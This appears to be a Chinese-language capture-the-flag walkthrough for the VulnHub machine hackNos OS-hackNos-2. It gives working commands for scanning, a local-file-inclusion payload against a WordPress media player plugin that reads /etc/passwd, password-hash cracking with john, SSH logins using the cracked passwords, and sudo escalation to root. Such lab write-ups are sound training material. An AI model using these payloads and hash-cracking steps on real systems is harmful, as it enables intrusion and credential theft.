靶机地址https://www.vulnhub.com/entry/hacknos-os-hacknos-2,403/#
目标为 普通用户的user.txt和root用户的root.txt
第一步现将我们下载好的靶机导入到VirtualBox中启动靶机 靶机设置为桥接模式kali也一样
一,信息收集
1,打开我们的kali
使用 arp-scan -l搜索内网或者的主机
找到我们的目标靶机ip,
这里有个技巧,通过VirtualBox >>设置 >>网络 >> 高级 >> 看到靶机的MAC地址,根据MAC地址来找目标靶机ip
下一步找到,ip后 使用nmap -sV 192.168.3.19 -O 命令来扫描该ip地址开放的端口
可以看出 开放的 22 端口和80端口
2.通过浏览器访问80端口发现为Apache
安装默认页面使用dirb
进行目录扫描...发现tsweb
目录为WordPress
站点...
dirb http://192.168.3.19/
得到一个http://192.168.5.133/tsweb/,在浏览器中访问它
二,漏洞扫描/john爆破
1.使用wpscan
工具进行漏洞扫描...
wpscan --url http://192.168.3.19/tsweb/ -e ap
2. 通过以上的扫描结果到Exploit-DB中进行查找漏洞利用方法,可以查看该漏洞可以查看具有此漏洞机器上的passwd
文件内容
发现有漏洞的插件GraceMedia Media Player
https://www.exploit-db.com/exploits/46537 //漏洞地址
The following URL have been confirmed that is vulnerable to local file
inclusion.Local File Inclusion POC:
GET
/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwdV. BUSINESS IMPACT
使用上面get以下的路径在浏览器上访问下,把原来的wordpress替换成tsweb。
将内容
flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash
复制并保存到本地 test文件中
3.通过查看passwd
文件可以看到flag
用户加密值给出来并保存到本地文件中通过john
进行破解...
echo 'flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash' > test
gunzip /usr/share/wordlists/rockyou.txt.gz
john test --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt
三,ssh登录/提权
1.破解flag密码为topsecret
并进行SSH登录...并查找passwd文件中使用bash登录的用户为rohit
并进行目录遍历发现该用户密码...
ssh flag@192.168.3.19登录
密码为 topsecret
登录之后查看
cd不了可以用这个命令
python -c 'import pty;pty.spawn ("/bin/bash")'
cat /etc/passwd | grep bash
将查看到的内容复制到本地 test3文件中
cat /var/backups/passbkp/md5-hash
将这个密码替换掉上面内容中第一个x
然后保存到文件test2中
也可以用命令
2.对rohit用户进行解密...并获取密码!%hack41
切换到rohit用户...
echo 'rohit:$1$rohit$01Dl0NQKtgfeL08fGrggi0:1000:1000:hackNos:/home/rohit:/bin/bash' > test3
john test3 --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt //进行解码耐心等一下
得到密码 ssh rohit@192.168.3.19 也可以在刚才的 flag用户下输入 su rohit进行切换用户
3.切换到rohit用户进入家目录发现user.txt发现当前用户具有sudo权限切换并进入到root用户家目录获取root.txt